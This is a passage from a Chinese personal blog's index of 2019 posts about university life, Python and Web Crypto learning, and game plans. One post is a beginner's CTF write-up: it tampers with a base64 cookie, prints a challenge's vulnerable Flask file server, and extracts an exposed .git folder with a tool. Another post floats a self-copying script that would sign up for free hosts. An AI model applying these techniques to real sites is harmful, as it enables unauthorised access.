我们的辅导员一直跟我们强调学长会和我们说不挂科的大学是不完美的大学，然后跟我们说这是错的，不要挂科啥的，不过我至今没见到哪个学长会这么说……当然我也确实不希望挂科，首先我不喜欢麻烦的事情，挂了一次后面重修很废时间，而且重修也是要钱的，这真的是很麻烦……所以我在开始的时候就尽可能的多赚平时分数，免得到时候考试又考不过之类的……另外还要多准备几手，比如找找漏洞啊，以及之前的出名也是一些准备……真的是很麻烦啊！Misc在大学也可以搞点有意思的东西，比如办银行卡(?)，除了已经办下来的天依卡外，我还办了一张招行的2233卡，虽然之前被作为电话卡的22卡坑了……不过那是运营商的错……招行的福利还是挺多的，比如每天用微信或支付宝转188出来，就可以抽到至少0.5CNY的红包，而且是那种可以直接提现的，比支付宝的红包好多了，另外就是新户的一堆福利，比如送了两条毛巾，一个杯子，还有一堆话费之类的……感觉起来还是不错的。   另外就是被支付宝忽悠着试着搞基金，基金这种东西确实很刺激，刚买下来就突然涨了好几块，不过我知道这种东西我玩不起，一周之后我就把钱提了出来，在这期间它涨了不少，但是也跌了不少，所以这么玩下来其实也基本上没赚多少，所以像买基金还有股票还是应该谨慎啊。2020年的打算我也不打算计划的很远，首先至少把大一的课程全部考过吧，然后另外就是学驾照，我希望能在这个寒假就把科目三考完，不过这还是挺难的，本来科目三就不简单，要记的东西很多，这也是我不擅长的……   对于我的5年计划，我又想再加点东西了23333，除了重构、邮件系统和游戏的计划外，我的Python老师又给了我两个新的想法，一个是前后端分离的CMS，另外一个是类似于CodeTank的游戏。   虽然现在已经有BaaS的服务，搞CMS已经没什么太大的意义了，不过想想搞这么一个东西好像也不是很难，CMS就是一个用户的权限加上文件的管理嘛，所以也就是只要提供一个API，这样我就只用写一些CRUD的东西就OK啦！   另外老师想做的游戏貌似是塔防游戏，大概就是提供一堆API可以定义攻击的人和防御的塔，然后插张地图进去，就可以搞一个有Python教学功能的游戏了。之前我觉得CodeTank其实做的挺好的，不知道怎么就凉了……不过这个游戏我觉得应该还是有点意思的，所以可以在毕业之前试着把这个东西做出来。   其他嘛……总之还是有机遇就抓吧，还有3年半，这点时间足够我抓住一个机遇了吧。" },{ "title": "New Game!", "category": "", "tags": "Game, 计划", "url": "/2019/12/17/game.html", "date": "2019/12/17", "content": "New Game?New 鸽子!新的想法昨天，我在上篇博客的结尾提到了我想要做的不需要后端的解谜游戏。在那之后我又想了想，我在高中的时候也想做一个游戏，因为当时玩了DDLC，心里十分感慨，很想自己做一个视觉小说，于是一冲动，在电脑上下了Ren’Py SDK，然后为了方便，搞了Ren’Py中文文档的镜像站    但是因为种种原因 （懒、人类的本质——咕咕咕），比如不会写故事啦，画画不好啦，以及音乐也不会做之类的。不过其实这些都不算很难的事情，因为我们现在不要求质量，只需要做出来就好了，有了第一个，第二个也不会远了吧。    事实上我为了做一个视觉小说也做了不少准备，比如收集各种各样的立绘，BG，SE，以及看了不少视觉小说的OP，希望作为自己的灵感。不过后来虽然游戏没做出来，但是收集的灵感还是很有用的，至少我在做PPT的ED的时候也不至于搞一个黑色的背景，然后只有STAFF在上面滚动了。新的计划既然之前说过我想做解谜游戏，又想做视觉小说，那么我们不如各退一步，做一个解密动态小说！    虽然说之前重构的计划和制作加密邮件系统的计划现在都在咕，但是我决定了，我要把我的计划推成五年计划 （比百年计划好多了23333），现在先找灵感，到时候就算做不完也不至于没得做。毕竟作为人其实不担心忙的问题，毕竟人现在的做事效率还是很低的，所以闲还是很容易的。为了避免这种事情，多来点计划也没关系吧。      这个小说的内容我暂时还没想好，不过机制我已经想好了，我打算把它做成套娃，用AES作为它的壳。也就是我需要先想好故事，然后第一层包含故事，线索和下一层的密文，而下一层同样含有故事线索和密文，这样也可以避免一个问题，那就是拆包（查看源代码）获得剧情。    很多游戏现在也有这样的问题，因为大多数情况玩游戏其实就是为了看剧情，但是游戏很多时候会通过游戏方式阻挡玩家看到剧情，所以要想了解整个剧情，很多玩家会选择拆包。但是对于一些游戏拆包就失去了它的游戏性，甚至会失去这个剧情想展现的效果。就比如DDLC，如果没有走剧情直接拆包，就感受不到Meta-Game的那种特别的感觉。    所以我使用AES加密可以大幅减少因为拆包而影响可玩性。不过由于技术问题，我打算使用博客里搞过的的这套加密方式作为阻止玩家得到接下来剧情的方式。不过这个加密好像用的是不安全的ECB模式，而且现在马上就要进入后量子密码时代了，所以可能对于某些大佬来说这点阻挡根本算不了什么吧……不过没关系，这本来就是为了阻挡大多数人而已。游戏模式除了像CTF那样的从文件/程序以及从各种解谜游戏中获得密码外，我打算再搞一些有运气含量的，也就是我只会提供密码在一定范围，然后按照一定的机率获得正确密码。毕竟欧气也是能力的一部分嘛，当然有技术的人也可以通过遍历的方式。总之就是得到下一层的故事比较有难度就可以了。     关于剧情走向嘛……我是挺想搞多分支的，不过那样工作量也大了不少……算了，到时候看剧情吧。    另外题目还要和剧情相配……真的是好麻烦……结语我自己连那些CTF的题都解不出来，还要自己出题？想想大多数系统其实也是易守难攻嘛，出题应该也不会太难吧……    emmmm……回头还是多了解了解CTF中的那些知识吧，不然自己都解不出来自己的题那还怎么设密码😂" },{ "title": "CTF初体验", "category": "", "tags": "CTF, Python", "url": "/2019/12/16/ctf.html", "date": "2019/12/16", "content": "我好菜啊开端前几天，有一个同学邀请我去打个线上CTF，我大概看了下时间，是在周末，于是我就答应了。   以前我倒是对CTF也有些了解，曾经也试着在网上找到一些题，不过那些题的评论区总是有一堆人透答案，体验极差，所以其实我也没真正做过CTF的题。   不过我曾经也攻击过一些网站，也算有点经验吧，所以觉得问题应该不大。答题到了周末，我还是像往常一样睡到中午，不过没关系，这个比赛持续2天，所以无所谓。   等到我想答题的时候题目也基本上全部都出来了，我打开网站一看，题的类型挺多的，有涉及密码学、二进制、文件组成、溢出之类乱七八糟的东西。当然我全都不会 （于是就凉了）。   虽然大多数都不会，不过至少我还是学过一些HTTP协议之类的东西，所以觉得我至少要解出一道Web题吧。   首先吸引我的是一个叫做Cookie的题，我想既然它叫Cookie，那么大概就是改改cookie就能解出来吧。题目大概是我有$50，有三种饼干，Flag饼干最贵，要$100，因为买不起，所以得不到Flag。那么解法应该就是想办法改我有的钱的，然后再去买Flag饼干就OK了吧。以这个思路，我看了下cookie，那是一个被base64编码后的json，解码后发现，里面有一个叫做money的key，这下我想那不就解出来了嘛，我修改了money的value，编码后提交，钱的数量不出意料的变了，然后我就去买Flag饼干，但是不知道为什么，改完以后所有饼干都买不了了……所以这道题最后没有解出来…… （太菜了）   之后我换了一道题，那道题叫做Swedish State Archive，打开后发现是一个正在维护的网站，查看源代码后发现了服务器的源码：from flask import Flask, request, escapeimport osapp = Flask(\"\")@app.route(\"/\")def index():    return get(\"index.html\")@app.route(\"/<path:path>\")def get(path):    print(\"Getting\", path)    if \"..\" in path:        return \"\"    if \"logs\" in path or \".gti\" in path:        return \"Please do not access the .git-folder\"    if \"index\" in path:        path = \"index.html\"    if os.path.isfile(path):        return open(path, \"rb\").read()    if os.path.isdir(path):        return get(\"folder.html\")    return \"404 not found\"if __name__ == \"__main__\":    app.run(\"0.0.0.0\", \"8000\")虽然我Python学的不多，但是至少我看到了.gti，看来是通过git获得Flag的题，但是它屏蔽了文件夹和index和logs两个路径的关键词……这该怎么做……后来我去网上搜了下解git类型的ctf的题，大多数人都用了一个叫做Githack的工具，我大概看了一下，这是个Python的脚本，但是它依赖于index文件，所以不能用。正当我要放弃之时，我发现了一个叫做Git Extract的工具，我试了一下，直接Flag就出来了😂，我当场就赏它了一个star……看来还是工具好用……   其他的题受限于水平原因，实在是做不出来……于是本次的CTF就这么结束了……结语CTF还是挺有意思的，看着我也想举办一个。不过除了CTF外还有另外一个更加大众化的东西，叫做网站迷宫，大概就是通过找线索，然后一层一层的往深处走的游戏，有点像解谜爬塔的游戏。   我想了想，这种游戏也可以做一个纯前端版，每个下一题都被AES加密，所以只有上一题解出来得到密码才能得到下一题，这听起来有点像CTF呀，不过本来好多CTF的题也是一个文件，Web的题不算多。   不过我自己连题都做不出来，还想什么出题😂……还是多研究研究吧。   另外如果我以后想去试试挑战CTF的话，就可以去CTFtime上看看了。" },{ "title": "废人的研究", "category": "", "tags": "废人, 研究", "url": "/2019/12/04/abuse.html", "date": "2019/12/04", "content": "我是废人吗？……不，我是研究者！（没有意义的解释23333）Part1.Are we real?你是真实的吗？如果你玩过VR就会感觉到现实与虚拟世界的差距，感受到差距的你很开心，因为你觉得现实世界无可替代，虚拟的世界永远是虚拟的。   然而虚拟与现实之间的差距就仅仅是延迟而已，之所以现实这么美好就是因为现在的科技还做不到那么低的延迟。   我要怎样证明这一点呢？很简单，既然科技的延迟下不来，那就提高自己感受的延迟吧。怎么做？去熬夜吧，熬夜会影响到神经信号的传输，这样就可以提高延迟而感受到这不真实的世界。   （洗白熬夜23333）Part2.How to denoise熬夜都熬过了，精神一定很不好吧？这时候来点外部的喧闹让人崩溃一下不过分吧？   怎么可能？现在怕是想毁灭世界的心都有了吧？不过我们不能真的毁灭世界，甚至连改变都不可以，那么我们怎么消除这个噪声呢？  降噪耳机？耳塞？太low了，那些东西平时戴上又不舒服，而且也不便宜。那么怎么做呢？   很简单，人感受到令人心烦的噪音其实不是声音有多大，也不是随机的声音，而是大脑不由自主处理的声音，比如人声。   在没睡好的情况下听到人讲话真的会很烦，但是毕竟我还要在这个社会生存，总不能把人都消灭吧？何况我也没有这个能力。   那么我们就可以通过干扰人声的方式来解决这个问题，播放更大的噪声压过他的声音吧！如果他要是敢反抗，正好可以让他闭嘴，而如果不行，那就继续，只要大脑不再处理人声，就不会那么难受了。Part3.How to anti sound record说到噪音降噪，我就回想起 （251？） 反录音了，反录音的原理好像和这个类似，就是通过放一些人听不到的噪音来干扰录音设备。因为录音设备是可以记录人听不见的声音，所以就会被干扰。   不过人听不到的声音机器在回放的时候按理来说那些听不到的声音应该还是听不到啊，那反录音是怎么做的？真的是难以理解，既然人能听到，那么就相当于人把它记录了，那么机器应该同样能正常的记录吧？真的是难以理解……Part4.Summary跑题了 （正说废人呢！） ……总之，熬夜带来的问题还是挺多的，只是某些问题 （都是些闲事）所迫，不得不……emmmm……总之如果能早点睡觉就好了。   另外也希望自己不会被一些噪音搞到心烦。" },{ "title": "Web Crypto Api学习笔记", "category": "", "tags": "学习笔记, Web Crypto Api", "url": "/2019/11/21/enc.html", "date": "2019/11/21", "content": "感觉要爆炸了……学习前在四个月前，我作了制作分布式加密邮件系统的计划，不过现在来看，这怕是得变成五年计划了……   Javascript是真的垃圾，搞一堆对象，各种各样的对象让人无言以对，不过也可能因为我以前用的是Linux Shell语言，那个语言在我学了Python之后还是感觉很舒服，因为它不用管变量类型，Bash之类的解析器会把它们一律看作字符串，遇到要运算的部分才会转换为数字。除此之外，它连接字符串是什么都不用加，不需要考虑变量是什么类型，只要解析器能分辨变量，它就能正常工作，也不需要什么强制转换之类乱七八糟的东西，而且它更没有什么乱七八糟的对象之类的概念。 （跑题了:-P）   不过浏览器只支持Javascript语言……没办法，看来只能动用我的Copy&Paste大法了。不过国内用Web Crypto Api的人好少，找了半天也没有什么示例可以Copy……没办法，那我只好去抄官方示例了……学习过程我在大学中也加了那么一个社团/协会，在社团办公室里虽然没人能帮助我学习Javascript，不过那里有多余的屏幕！然后我就体验了一下双屏幕工作的感觉，那个感觉还是挺不错的（也可能是我的屏幕分辨率太低了，是1366x768的垃圾屏幕……）一个屏幕打代码，另一个看网页效果，还是挺不错的，至少不用不停的切换窗口了。   看着示例代码，我感觉真是要爆炸了，各种奇葩的对象，像什么ArrayBuffer还是什么Uint8Array啥的，还有一堆乱七八糟要求的格式，密码长度还必须是16的倍数？而且还有什么初始向量iv……真的是一言难尽……   不过我还是发挥了作为辣鸡程序员的特长——Copy&Paste大法，最终可算是拼凑出了一个看起来勉强能用的代码……辣鸡代码function getByteLen(val) {    var len = 0;    for (var i = 0; i < val.length; i++) {        if (val[i].match(/[^\\x00-\\xff]/ig) != null) len += 3;        else len += 1;    }    return len;}  function importSecretKey(rawKey) {    return window.crypto.subtle.importKey(      \"raw\",      rawKey,      \"AES-GCM\",      true,      [\"encrypt\", \"decrypt\"]    );  }  async function encryptMessage(key) {\tiv = window.crypto.getRandomValues(new Uint8Array(12));    ciphertext = await window.crypto.subtle.encrypt(      {        name: \"AES-GCM\",        iv: iv      },      key,      encoded    );console.log(ciphertext)  }    let secretKey;const enc = new TextEncoder();keyword=\"Mayx\"    while (getByteLen(keyword) % 16 != 0) {        keyword = keyword + \"\\0\";    }const rawKey = enc.encode(keyword);const encoded = enc.encode(\"Mayx is Good\");(async () => {    secretKey = await importSecretKey(rawKey);\tencryptMessage(secretKey);})();感想路漫漫其修远兮，吾将上下而求索，我还是要继续加油啊！" },{ "title": "Bug Forever！", "category": "", "tags": "Github, Archive", "url": "/2019/11/18/archive.html", "date": "2019/11/18", "content": "Github 太强了！GitHub Archive Program前几天，Github搞了一个神奇的计划，大概内容是把Github上所有的公有仓库保存到北极。据说他们会将 （BUG） 这些仓库保存千年😝，另外这个计划将在2020年2月2日开始。   我感觉这个计划很有意思啊，其实当时我在选择在哪里存博客的时候有考虑过博客存储的稳定性。同样，我也不相信有哪一个网站或者是公司能永久的存活。不过这个想法只是在社会层面，并没有考虑人类在这个地球生存的问题。   当时我的想法是如果能写一个脚本，它会自动的找到所有可用的免费主机，然后自动注册，把自己上传上去。然后那个主机也有运行这个脚本的能力，所有的脚本都会每隔一段时间运行，这样就可以保证它能永久的存在于这个世界了。   不过Github的这个项目更加夸张，因为所有现在的存储设备都不算稳定。像SSD因为是通过电容存储，存在漏电的问题，所以可能只能保证5-10年的存储。寿命更长的HDD是通过磁性材料存储，根据熵增定律，磁性存储的东西终将变得混乱，所以HDD大概能保证100年左右数据不损坏，另外HDD中的磁片保存要求也很严格，所以损坏的可能性更高。想想好像还是光盘比较稳定。也许作为有机物的塑料会比较容易分解，但是如果用玻璃制作那就基本上可以永久存储了吧。不过想想圆形的光盘果然还是太占用空间了，所以Github使用长方形的胶片存储相比光盘可能有更好的存储密度吧。毕竟这个计划并不在意读取是否方便，而是更在意它能保证能长时间存储的前提下存储的东西更多。这个计划还真是有意思。千年以后千年之后，我觉得我应该是活不到那个时候了，尽管有的时候我可能会犯中二病，但是现实是残酷的。如果说Github能保存我的博客直到千年以后，那也是很不错的事情了。想想我在一年前转载的那篇文章，尽管事情后来并没有证明，但是人没了，博客还在这种事情还是令人感觉有些悲伤的。不过对我来说，果然还是希望自己写的东西能一直保存下来😁，每个人写的东西都带有他的思想，所以如果作品能一直留存下来，也算是一种永生了吧😂。不过即使这样也是只读的了，只有其他人能看到我的信息，而我不能看到未来的世界……总而言之，这个计划还是挺有意思的，这时候再吹一波Github，Github太强了！" },{ "title": "Mayx应聘失败(Python版)", "category": "", "tags": "应聘, Python, 面向时间", "url": "/2019/11/01/python.html", "date": "2019/11/01", "content": "既然最近学了Python，那就去应聘一下Python程序员吧XD上次去面试运维失败了，这次不能这么丢人了。 然后那个面试官居然又让我写排序的程序23333Mayx想了想，写出了以下代码：a=[1,2,3,5,4,9,10,8,5]import threadingimport timedef counting(i):    time.sleep(i)    print(i)for i in a:        threading.Thread(target=counting,args=(i,)).start()执行效果：1234558910然后，Mayx被赶出来了…… 我写的代码明明可以执行，效果也没问题，居然赶我出来，这一定是个垃圾公司！ 后来才知道，他们又想让我回答sort()，怕是同一家公司（笑）" },{ "title": "Python学习笔记 - 求质数", "category": "", "tags": "Python, 质数, 学习笔记", "url": "/2019/10/21/python.html", "date": "2019/10/21", "content": "讲真，我酸了……起因在学习Python的过程中，我和同学举行了一个比赛，大概内容是用Python做一个时间复杂度最低的质数生成器。   在学校里就是有个好处，学校网络上知网下论文是免费的，我大概的查了一下，好像用埃氏筛法的效率比较高。   以前我用Linux Shell也写过一个：#!/system/bin/shmax=1000list=\"2\"rlist=\"2\"i=3while [ $i -lt $max ]do[ \"$(echo \"$list\"|while read ado[ \"$(($i%$a))\" == \"0\" ]&&{echo \"1\"break 1}done)\" == \"1\" ]||c=$i[ \"$bj\" == \"\" -a \"$c\" != \"\" ]&&{[ \"$((${c}*${c}))\" -gt \"$max\" ]&&bj=\"1\"}[ \"$c\" == \"\" ]||{[ \"$bj\" == \"1\" ]||{list=\"$list$c\"}echo \"$c\"}c=\"\"i=\"$(($i+1))\"done不过效率极低……因为原生Shell是不支持数组之类的东西，所以其实并不能完全使用埃氏筛法……使用Python做一个当然Python还是可以用的，于是我理解了一下，做了一个出来：maxprime=100000rprimeset=set(range(2,maxprime+1))lprimeset=set()lastprime=0while lastprime<=maxprime**0.5:        lastprime=min(rprimeset)        rprimeset=rprimeset-set(range(lastprime,maxprime+1,lastprime))        lprimeset.add(lastprime)primelist=sorted(list(rprimeset|lprimeset))print(primelist)#print(primelist,file=open(__file__[:__file__.rfind(\"/\")]+\"/prime.txt\",'w+'))这个效率确实比Shell做的好太多了，而且看起来也清晰易懂。在我的电脑上，1000000的质数只需要4s就能算出来结局不过我后来在某百科上查了一下他们用埃氏筛做的Python版本……然后我就酸了……他们的代码在我的电脑上只需要0.6s就能跑完1000000的质数……而且我估计他们的空间复杂度还比我小……  #    python 原生实现 def primes(n):    P = []    f = []    for i in range(n+1):        if i > 2 and i%2 == 0:            f.append(1)        else:            f.append(0)    i = 3    while i*i <= n:        if f[i] == 0:            j = i*i            while j <= n:                f[j] = 1                j += i+i        i += 2     P.append(2)    for x in range(3,n+1,2):        if f[x] == 0:            P.append(x)     return P n = 1000000P = primes(n)print(P)感觉好难受，每次在网上搜的代码都比我写的好……算了，反正我也是在学习嘛。   后来我听说用欧拉筛法的效率更高……可惜我看完后不太理解……质数算法可真是复杂啊……" },{ "title": "Python学习笔记 - Turtle", "category": "", "tags": "Python, 学习笔记, Turtle, Logo, Tkinter", "url": "/2019/09/28/python.html", "date": "2019/09/28", "content": "没想到我终有一天也得学Python了……第一课！Turtle我以为我们老师会从Python的基本语法开始教起，不过事实证明我想错了，我们老师打算把我们当做小学生看，然后教 Logo语言 类似Logo语言的Python库，Turtle。   Turtle貌似是基于Tkinter的库，Ubuntu上带的Python默认没有装Tkinter，结果我还得自己装一下……   老师给我们布置了两个作业，一个是画一个心形，另外是画一个正方形。在开始之前，我也想的这个库就是个Logo语言，也没想着在网上看看这个东西支持什么方法，画正方形也很简单，就是向前向左……执行4遍。很快，我就用循环写出了这个东西：import turtlei=0while i<4 :\tturtle.forward(50)\tturtle.left(90)\ti=i+1看着这段代码，让我回想起了我的小学时光 （一段不堪回首的往事23333） 既然能画出正方形，那么圆也很简单了，我们可以把圆看成一个无限多边形，那么画圆我们可以这样：import turtlei=0while i<360 :\tturtle.forward(2)\tturtle.left(1)\ti=i+1画完圆之后我又打算画心形，不过老师布置的是在终端中显示心形，就像这样：print(\"\"\" ** ***  *  * *   *  * *   *\"\"\")不过这个感觉没什么意思，我想我可以试试在Turtle里画一个心形。在画之前，当然应该上网查一下Turtle还有什么用法，结果一查以后我就自闭了……画正多边形根本不用一步一步走，有一个叫做circle的方法可以直接实现，比如画正方形可以这样：import turtleturtle.right(45)turtle.circle(100,360,4)……这可真是令人难受……不管了，我先画个心形吧，我捡起了我曾经的三角函数的知识，算了一下我要转的角度和长度，最终写出了这样的东西：import turtleturtle.color('red','red')turtle.filling()turtle.begin_fill()turtle.left(90)turtle.circle(50,180,180)turtle.left(30)turtle.forward(200)turtle.left(120)turtle.forward(200)turtle.left(30)turtle.circle(50,180,180)turtle.end_fill()input()当然，我不知道心形的定义是什么，所以也不知道心形是怎么组成的，我想象的大概就是两个半圆和一对等腰拼出来的吧，不过最终画出来的心形是真的丑……   最后我在网上又查了一下其他人写的，然后继续自闭……   其他人的心形：from turtle import *def curvemove():    for i in range(200):        right(1)        forward(1)color('red','pink')        begin_fill()left(140)forward(111.65)curvemove()left(120)curvemove()forward(111.65)end_fill()done()总结虽然我不喜欢看文档，但是遇到新的东西还是查一下比较稳妥啊！" },{ "title": "开学总结", "category": "", "tags": "开学, 总结", "url": "/2019/09/20/start.html", "date": "2019/09/20", "content": "假期结束不就是开学嘛…… （实在是没得水了么23333）到学校之前的一些事我是通过自驾的方式去的学校，在途中去了不少地方，算是边旅游边去的学校吧。不过总的来说，旅游可真是累啊，虽然自驾游时间没那么紧张，但是为了尽可能在到学校之前多去一些景点，还是挺赶时间的。   我在这次去了不少景点，有青木川、阆中、重庆、乐山和峨眉山。在旅游途中，最令人失望的地方是甘肃，在经过甘肃的时候，居然没有一条能直接穿过甘肃的高速，不走高速的话就只能走县道了，但是那个县道是真的烂，好多地方都是烂泥路，让人深深的感受到甘肃的贫困。   到重庆之后可以深深的感受到作为山城的感觉，在重庆去哪里都要爬楼梯，而且作为山城，他们没有地上和地下之分，轨道交通有时候可以在地面之上行驶，有时候则是在山里面，甚至有时会在房子里面穿行。不过重庆还是在建设中，所以还是有很多地方都在修路。   另外在重庆发生了一点令我难受的小事，有一家很烂的冰激凌店涉及虚假宣传，而且店长会耍顾客，而且一个冰激凌相当贵，要二十多，但是东西只有一点点，这真的是极其垃圾的店， 我祝这位店长买菜必超级加倍，做事必被指指点点 ，我相信在这个市场中，对顾客不尊敬的商家，必然会遭到市场的报复！   除此之外我在重庆我还坐了长江索道，这应该就是我在这次旅游中拍到的所有视频了。   在峨眉山的时候也很惨，那里有相当多的蚊子，我不知道也没做防护措施，而且刚被叮也没什么感觉，结果后来整条腿就像是得了埃博拉一样满腿的包，而且可能南方的蚊子和北方不一样，叮完以后就会起水泡，抓破之后就会渗出液体，真的是令人难受啊……   我在上一篇博客中说我办了一张借记卡，不过地址貌似填的不完整，被驳回了，不过还好被驳回了，不然我就取不到那张卡了（我填的是家里的地址）。于是我在2019.9.1时重新申请了一下。  最后，我在2019.9.4时成功的抵达了学校。到学校后发生的事到学校之后也没发生特别多的事，不过在旅游的时候提前在QQ上加了一个舍友，所以到学校之后倒是也没糟糕到一句话也不说，但是最开始还是很糟糕的，基本上就算是说话也会让人感到尴尬。不过这应该是很正常的事情吧，我觉得应该很快这个问题就会被解决吧……但是事实上并不会，因为我的交往能力极其的差，表达和做事都很难与人在一个频道，这真的是让人很难受QAQ。   在学校的说明上很明显的标出来不要相信某些来寝室的人的推销，可是我就是非要犯一下智障症，来表现一下我就是个智障23333。有一个来寝室卖公交卡的人说他卖的公交卡可以使用10年，然后坐车有一定的折扣，我没想它是一个骗子，而是想的是我需不需要公交卡，真的是太蠢了！我想通了我要公交卡之后我就立马付钱了！也没仔细看一下卡片，像我这样智障的人怕是给我一张纸片说这是公交卡我也信了吧！总之后来闲下来的时候我仔细看了看那张卡，结果上面写的是有效期两年，然后我去官网上把卡号输上去之后发现，这个卡已经没钱了，而且也过期了……这真是个耻辱啊，不过这也算是步入社会交的第一笔智商税吧……（也许以前交的我都忘了23333）   报名之后就是军训了，算是开学第一课吧。到学校之后的军训众所周知，到了大学是要军训的，不过我感受到我们学校的军训真的是太水了，根本不能和我高中时候的军训相比。不过我听到一位学长说，军训的强度和学校有关，像我们学校根本不跑早操，到后来基本上就是动两下就坐下休息了，但是他的学校貌似每天都要负重跑。不过学长的话只能信一半，具体情况怎么样我也不知道，但是我们学校军训是真的水，这个是毋庸置疑的。   在军训前领服装的时候，我没太在意服装的尺码，结果选小了一号，然后在第一天就把迷彩裤搞坏了，结果军训的这十几天就只能穿破裤子军训了。虽然我个人并不在乎这个问题，不过同学还是会在乎的……QAQ   总的来说，我感觉这次的军训还没之前旅游更辛苦。不过也可能和我们连什么也没干有关，有些连队是要参与表演的，所以可能会更辛苦吧。其余的杂事在上面所说的借记卡过了将近一个月之后它终于发货了，我之前以为办银行卡和手机卡一样，今天申请，明天就能到，但是事实上不一样……它受理用了一周，审批又是一周，制卡还得4-5天，然后过了这么长时间才开始寄发，可能还得几天……真的是太难了……   另外，我对大学生活还是挺有希望的，为此我也加入了一个社团和学生会，希望在后来的生活中，我能学到点有用的东西，而不是在这里水博客了。" },{ "title": "假期总结", "category": "", "tags": "假期, 总结", "url": "/2019/08/24/sth.html", "date": "2019/08/24", "content": "这个假期还真是碌碌无为啊……这个假期做了什么？我感觉什么也没做，也许到了假期之后确实就会变成这样吧，在高考前我甚至都在兴致勃勃的学怎么写博客，学MediaWiki API，学PHP……但是一到了假期，反倒碌碌无为，什么也不想干……即使之前定了很多计划，到了假期却没有一点点干劲……   大概这就是人吧，忙的时候想忙些闲事，闲的时候……就真闲了，没有一点干劲……   但是吧，要说干了些什么，也不是没干，至少我把科目一和科目二过了，然后给电脑加装内存条还给装坏了……拿去让维修电脑的修还没修好，要换主板……还好还能用，就勉强先这样用吧。   另外还去献了个血，感觉献血对我也没什么太大伤害所以就去献了一下，不过第一次献血还是挺害怕的，尽管之前有在学校体检抽血的经验，但是毕竟还是会疼啊……不过过了几天之后就好了，针孔也不是很明显，顺便去网上查了一下血检结果，是一切正常，看起来不错。   前几天我看到中国银行有办以天依为主题的借记卡 （这都是3月份的活动了吧……） ，于是就去申请了一张。但是我马上就要开学走了，也不知道能不能在我走之前送到我的手里……   对了，这个假期我还在闲鱼上卖了些东西，一个是血亏价（60CNY）卖出去的4GiB DDR4的内存条（还包邮，就是说我只赚了48CNY😭），还有一个锤子T1（SM705）手机，那个买家事还挺多，200CNY买一个原价4000CNY的手机还觉得边角磕了碰了，然后为了惩罚我，还要让我等到10天后系统自动确认收货……在闲鱼上卖东西真是让人难受啊(T＿T)总结这个假期可算是把我玩废了，无论是身体还是心理……希望我作为人类能让我发挥这快速适应的能力，让我快速恢复到正常状态！" },{ "title": "记一次悲惨的加装内存的事故", "category": "", "tags": "悲惨, 事故, 内存", "url": "/2019/08/17/memory.html", "date": "2019/08/17", "content": "这……大概就是命运吧……QAQ悲惨的开端因为学校要求使用8GiB运存的电脑（难不成是想用VS？），然后我的笔记本电脑只有4GiB。我考虑了一下，买一条内存条也不贵，于是我在某宝上买了一个和我笔记本电脑内存型号相同的内存条。   在到货的前几分钟，我就开心的把电脑主板提前拆出来了，等我一拿到取件码，就去把内存条取了回来 （顺便得到一堆泡泡纸，血赚23333）   等我安好内存条，我试了试裸板开机，不错，看来至少主板没有被我搞坏，然后我连上键盘和显示器之后，BIOS也正确的读取到了内存条，看来是成功了。   我这么边想着就边把电脑往回装，装着装着结果电池接口突然开始冒烟，吓得我立即把电池拔了，之后我继续装，总算是没看到更多异常情况。  等我全部安装完成后电脑倒是也正常开机了，操作系统也成功的读取到了内存，而且是同一型号的内存条，应该也成功的组成了双通道吧，我试了试整体电脑的操作，倒是确实比之前流畅了一些。噩梦开始过了几个小时之后，我发现电池灯还在显示充电状态，这时我慌了，我打开电脑发现充了半天电，电量没有一点点变化，又过了几个小时，电池灯开始不停的闪烁，看来是翻车了。后来我把电池又重新安装了一遍，但是貌似还是没有什么改变，但是把外接电源拔掉仍然可以正常使用，所以看来是充电芯片在之前冒烟的事故中灰飞烟灭了QAQ。感想我自认为我安装的时候也没有什么可能会让电脑出现这种问题的操作啊……难不成是因为我先安装了电池的问题？也许电脑在插完所有其他线的时候不应该插电池线吧…… 总之，这就是命运吧……QAQ    最近运气都不怎么好，希望这糟糕的运气不会影响我接下来科目二的考试……" },{ "title": "记一次办理22卡的经历", "category": "", "tags": "Mayx, 大学", "url": "/2019/08/05/blilblil.html", "date": "2019/08/05", "content": "我生气了！What happened?某天，Mayx正在使用Bilibili，手抖按到了一个广告上，看起来好像是办理Bilibili的2233和小电视卡的。Ta让我答了几道题之后把我的个人信息骗走了（还不是自己主动输进去的2333）    之前我办过米粉卡，那个是真的不错，三个月流量不限，而且一分钱不花。我看这个卡貌似提到了免费，所以就办理了。   过了一两天，中国联通给我打来了电话，让我带着身份证下楼办卡，我也没多想，就下去了。   没两分钟，我就被骗走了50CNY(QAQ)   原来所谓的免费只是首月免费，广告里可没提要多交钱啊！   不过算了，既然已经办了，那就用吧，未来的五个月我可以随便看番了……这样想的你可真是大错特错，要知道免流卡用够40GB的流量就会限流，速度慢到看360p都会卡，我平时都看的是1080p的视频，看大概2小时就要用掉1GB的流量，一个月可不只有40个小时，我每天如果看四小时就要120小时，即60GB，那么之后的这几十个小时就只能看360p还卡的视频了……   总的算下来就是每月10CNY不限流看Biliblil的视频，5个月以后我就把这张卡扔了吧。感想不错，广告你赢了我一次，但总有一天你一定会后悔！（我的小米手机的广告已经被我铲除干净了）   真希望有一天所有的广告用户都有关闭的权利！（VIP除外）" },{ "title": "Mayx终于考上大学了", "category": "", "tags": "Mayx, 大学", "url": "/2019/07/25/college.html", "date": "2019/07/25", "content": "真是Amazing！Where am I?这次我考到成都了，考了一个网络工程专业 （说不定就成装宽带的了23333（不过中国移动是真的垃圾，就是以后装宽带也不去移动））   不过我看这个专业的以后当运维的比较多，那如果真是这样，以后每年的昨天（7月24日）就可以过节了23333How about it?考上了作为一个原三本的院校，其实也不能算很好，但是相比于经常犯智障的我，也算是一个不错的结果了。总之，以后我应该就能了解更多关于网络方面的知识了。" },{ "title": "EncMail-Project Part 1 - 准备阶段", "category": "", "tags": "分布式, 加密, 邮件, 计划", "url": "/2019/07/15/encmail.html", "date": "2019/07/15", "content": "我是不会承认自己咕咕咕的！    参照：初计划准备的内容最终经过多方研究，我打算用Web Crypto API作为主要的实现方法。   不过用这种API的兼容性并不怎么好……我的博客之所以用了各种各样的JS库也是为了兼容性 （是不会写吧233333）   其实主要原因是因为我在网上搜不到哪个JS库能生成密钥对……之前有看到过有一个名叫jsencrypt的库，可惜只能加解密，不能生成密钥对……   说实话我从来都没有用过WebAPI，所以还得好好看看文档。但是这个破烂文档连例子都没有，这让人很难办，搜也搜不到有用的内容，而且我的英语并不算好，也不太习惯上Stack Overflow （不行，我要把锅推给某国的网络审查） 。正是如此，这个项目制作起来可能会相当花时间。   另外界面我打算用MDUI，那个文档看起来还挺简单。本来我没打算做一个好看的页面，就像之前制作的Iwara 